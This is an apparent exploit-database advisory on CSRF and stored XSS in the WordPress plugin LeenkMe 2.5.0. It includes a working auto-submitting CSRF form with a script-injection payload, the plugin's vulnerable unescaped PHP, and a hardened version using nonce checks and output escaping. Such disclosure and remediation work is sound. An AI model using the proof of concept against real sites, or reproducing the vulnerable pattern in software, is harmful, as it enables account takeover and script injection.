ID 1337DAY-ID-25009
Title WordPress leenk.me 2.5.0 Plugin - Cross-Site Request Forgery / Cross-Site Scripting
Type zdt
Reporter cor3sm4sh3r
Modified 2016-04-18T00:00:00
Description Exploit for php platform in category web applications
I would like to disclose a CSRF and stored XSS vulnerability in the WordPress
plugin LeenkMe version 2.5.0.
The plugin can be found at https://wordpress.org/plugins/leenkme/
In the page wp-content/plugins/leenkme/facebook.php, the XSS-vulnerable fields are:
- facebook_message
- facebook_linkname
- facebook_caption
- facebook_description
- default_image
- _wp_http_referer
This CSRF was tested on the latest WordPress installation (4.4.2) using the
Firefox browser.
The code for CSRF.html is:
<html>
  <body onload="document.forms['xss'].submit()">
    <form name="xss" action="http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
      <input type="hidden" name="facebook_profile" value="on" />
      <input type="hidden" name="fb_publish_wpnonce" value="" />
      <input type="hidden" name="_wp_http_referer" value="XSS" />
      <input type="hidden" name="facebook_message" value="XSS" />
      <input type="hidden" name="facebook_linkname" value="XSS" />
      <input type="hidden" name="facebook_caption" value="XSS" />
      <input type="hidden" name="facebook_description" value="</textarea><script>prompt();</script>" />
      <input type="hidden" name="default_image" value="XSS" />
      <input type="hidden" name="message_preference" value="author" />
      <input type="hidden" name="clude" value="in" />
      <input type="hidden" name="publish_cats[]" value="0" />
      <input type="hidden" name="update_facebook_settings" value="Save Settings" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
The vulnerable page is wp-content/plugins/leenkme/facebook.php.
The vulnerable code producing the XSS (request parameters copied into the settings without any sanitisation) is:
if ( !empty( $_REQUEST['facebook_message'] ) )
    $user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
    $user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
    $user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
    $user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
    $user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
    $user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
    $user_settings['facebook_description'] = $_REQUEST['facebook_description'];
------------------------- snip -------------------------
<td><textarea name="facebook_message" style="width: 500px;" maxlength="400"><?php echo $user_settings['facebook_message']; ?></textarea></td>
</tr>
<tr>
<td><?php _e( 'Default Link Name:', 'leenkme' ); ?></td>
<td><input name="facebook_linkname" type="text" style="width: 500px;" value="<?php echo $user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td><?php _e( 'Default Caption:', 'leenkme' ); ?></td>
<td><input name="facebook_caption" type="text" style="width: 500px;" value="<?php echo $user_settings['facebook_caption']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td style='vertical-align: top; padding-top: 5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description" style="width: 500px;" maxlength="300"><?php echo $user_settings['facebook_description']; ?></textarea></td>
The code intended to protect against CSRF (the anti-CSRF nonce field) is:
<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>
But this code does not protect against CSRF: the form is submitted successfully
without any error even though fb_publish_wpnonce is left empty, which results in
the CSRF vulnerability (the nonce is emitted into the form, but its value is not
checked when the form is processed).
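The handler and template quoted above can be hardened in two independent places: verify the nonce before any field is read, and escape each stored value for the HTML context it is printed into. The following is an added example written for this advisory, not code from the LeenkMe plugin or its author. It assumes it is loaded inside WordPress; the function names leenkme_example_save_settings and leenkme_example_render_form are hypothetical, while every WordPress API call they make is real. One caveat: sanitize_textarea_field() exists only since WordPress 4.7, so on the 4.4.2 install the advisory was tested against, sanitize_text_field() would be used instead.

```php
<?php
// Added example (not the plugin's own code): a hardened version of the
// settings handler and form markup quoted in the advisory. Assumes it runs
// inside WordPress; the two function names are hypothetical, the WordPress
// API calls (check_admin_referer, current_user_can, wp_unslash,
// sanitize_text_field, sanitize_textarea_field, wp_nonce_field, esc_attr,
// esc_textarea, esc_html_e, esc_attr_e, wp_die) are real.

/**
 * Process the submitted Facebook settings form and return the sanitised
 * settings array. Persisting the array is unchanged and not shown here.
 */
function leenkme_example_save_settings() {
    // A nonce proves the request came from a form we rendered; it is not an
    // authorisation check, so the capability is required as well.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.' );
    }

    // CSRF fix: verify the nonce emitted by
    // wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ). check_admin_referer()
    // calls wp_die() when the nonce is missing, empty or does not verify, so the
    // empty fb_publish_wpnonce sent by CSRF.html never reaches the code below.
    check_admin_referer( 'fb_publish', 'fb_publish_wpnonce' );

    // Read $_POST (not $_REQUEST, which also accepts query-string values),
    // undo the slashes WordPress adds, and sanitise for the storage context.
    $user_settings = array();
    foreach ( array( 'facebook_linkname', 'facebook_caption', 'default_image' ) as $field ) {
        $user_settings[ $field ] = isset( $_POST[ $field ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $field ] ) )
            : '';
    }
    foreach ( array( 'facebook_message', 'facebook_description' ) as $field ) {
        // sanitize_textarea_field() keeps newlines; available since WordPress 4.7.
        $user_settings[ $field ] = isset( $_POST[ $field ] )
            ? sanitize_textarea_field( wp_unslash( $_POST[ $field ] ) )
            : '';
    }
    return $user_settings;
}

/**
 * Render the settings form. Every stored value is escaped for the HTML
 * context it lands in: esc_textarea() for textarea content, esc_attr() for
 * attribute values. A saved "</textarea><script>..." string is therefore
 * displayed as literal text instead of closing the element and executing.
 */
function leenkme_example_render_form( array $user_settings ) {
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>
        <table>
            <tr>
                <td><?php esc_html_e( 'Default Message:', 'leenkme' ); /* label text assumed */ ?></td>
                <td><textarea name="facebook_message" style="width: 500px;" maxlength="400"><?php
                    echo esc_textarea( $user_settings['facebook_message'] );
                ?></textarea></td>
            </tr>
            <tr>
                <td><?php esc_html_e( 'Default Link Name:', 'leenkme' ); ?></td>
                <td><input name="facebook_linkname" type="text" style="width: 500px;" maxlength="100"
                    value="<?php echo esc_attr( $user_settings['facebook_linkname'] ); ?>" /></td>
            </tr>
            <tr>
                <td><?php esc_html_e( 'Default Caption:', 'leenkme' ); ?></td>
                <td><input name="facebook_caption" type="text" style="width: 500px;" maxlength="100"
                    value="<?php echo esc_attr( $user_settings['facebook_caption'] ); ?>" /></td>
            </tr>
            <tr>
                <td style="vertical-align: top; padding-top: 5px;"><?php esc_html_e( 'Default Description:', 'leenkme' ); ?></td>
                <td><textarea name="facebook_description" style="width: 500px;" maxlength="300"><?php
                    echo esc_textarea( $user_settings['facebook_description'] );
                ?></textarea></td>
            </tr>
        </table>
        <input type="submit" name="update_facebook_settings"
            value="<?php esc_attr_e( 'Save Settings', 'leenkme' ); ?>" />
    </form>
    <?php
}

// Entry point for the settings page: save only on a real submission, then render.
if ( isset( $_POST['update_facebook_settings'] ) ) {
    $user_settings = leenkme_example_save_settings();
    // ... persist $user_settings exactly as the plugin already does ...
} else {
    // Hypothetical empty defaults; the plugin would load the stored values here.
    $user_settings = array(
        'facebook_message' => '', 'facebook_linkname' => '', 'facebook_caption' => '',
        'facebook_description' => '', 'default_image' => '',
    );
}
leenkme_example_render_form( $user_settings );
```

The check_admin_referer() call on its own closes the CSRF: with a missing or empty fb_publish_wpnonce it stops in wp_die() instead of falling through to the assignments. The output escaping is what closes the stored XSS, because the same setting is printed into two different contexts (an attribute value and textarea content) that need different escaping; sanitising on input is defence in depth, not a replacement for it.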
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# 0day.today [2018-02-19] #